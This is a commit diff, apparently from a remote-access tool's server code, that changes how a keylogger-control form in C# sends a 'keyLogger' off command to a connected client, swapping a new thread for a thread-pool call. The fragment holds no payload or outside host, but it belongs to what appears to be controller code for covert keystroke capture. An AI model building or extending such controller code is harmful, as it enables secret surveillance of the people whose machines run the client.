Update FormKeylogger.cs
This commit is contained in:
parent
3777466ff5
commit
ea18dee01f
@ -39,13 +39,13 @@ namespace Server.Forms
|
|||||||
Sb?.Clear();
|
Sb?.Clear();
|
||||||
if (Client != null)
|
if (Client != null)
|
||||||
{
|
{
|
||||||
new Thread(() =>
|
ThreadPool.QueueUserWorkItem((o) =>
|
||||||
{
|
{
|
||||||
MsgPack msgpack = new MsgPack();
|
MsgPack msgpack = new MsgPack();
|
||||||
msgpack.ForcePathObject("Packet").AsString = "keyLogger";
|
msgpack.ForcePathObject("Packet").AsString = "keyLogger";
|
||||||
msgpack.ForcePathObject("isON").AsString = "false";
|
msgpack.ForcePathObject("isON").AsString = "false";
|
||||||
ThreadPool.QueueUserWorkItem(Client.Send, msgpack.Encode2Bytes());
|
ThreadPool.QueueUserWorkItem(Client.Send, msgpack.Encode2Bytes());
|
||||||
}).Start();
|
});
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
Loading…
x
Reference in New Issue
Block a user